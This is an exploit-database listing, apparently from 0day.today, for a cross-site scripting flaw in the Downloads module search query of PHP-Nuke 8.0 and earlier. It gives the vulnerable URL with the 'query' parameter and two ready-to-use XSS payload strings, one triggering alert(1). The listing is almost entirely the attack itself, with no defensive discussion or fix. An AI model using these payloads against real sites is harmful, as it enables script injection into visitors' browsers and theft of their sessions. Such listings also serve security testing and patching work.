PHP-Nuke <= 8.0 Downloads Module XSS

2009-11-21T00:00:00
ID 1337DAY-ID-10000
Type zdt
Reporter Rohit Bansal
Modified 2009-11-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================
PHP-Nuke <= 8.0 Downloads Module XSS
====================================

# Exploit Title: XSS Downloads Module PHP-Nuke <= 8.0
# Date: 19 Nov 2009
# Author: Rohit Bansal
# Version: PHP-Nuke <= 8.0
# Tested on: independent platform
# Code :
 
--------------------------------------------------------------
|XSS Downloads Module PHP-Nuke <= 8.0
|Grab Status: 100%. |
--------------------------------------------------------------
 
[+] VULN:
 
http://server/modules.php?name=Downloads&d_op=search&query=[XSS]
 
WHERE IS:
 
[XSS] = '';!--"
 
OR
 
'';!--"=&{(alert(1))}
----------------------------------------------------------------------------------------------



#  0day.today [2018-03-09]  #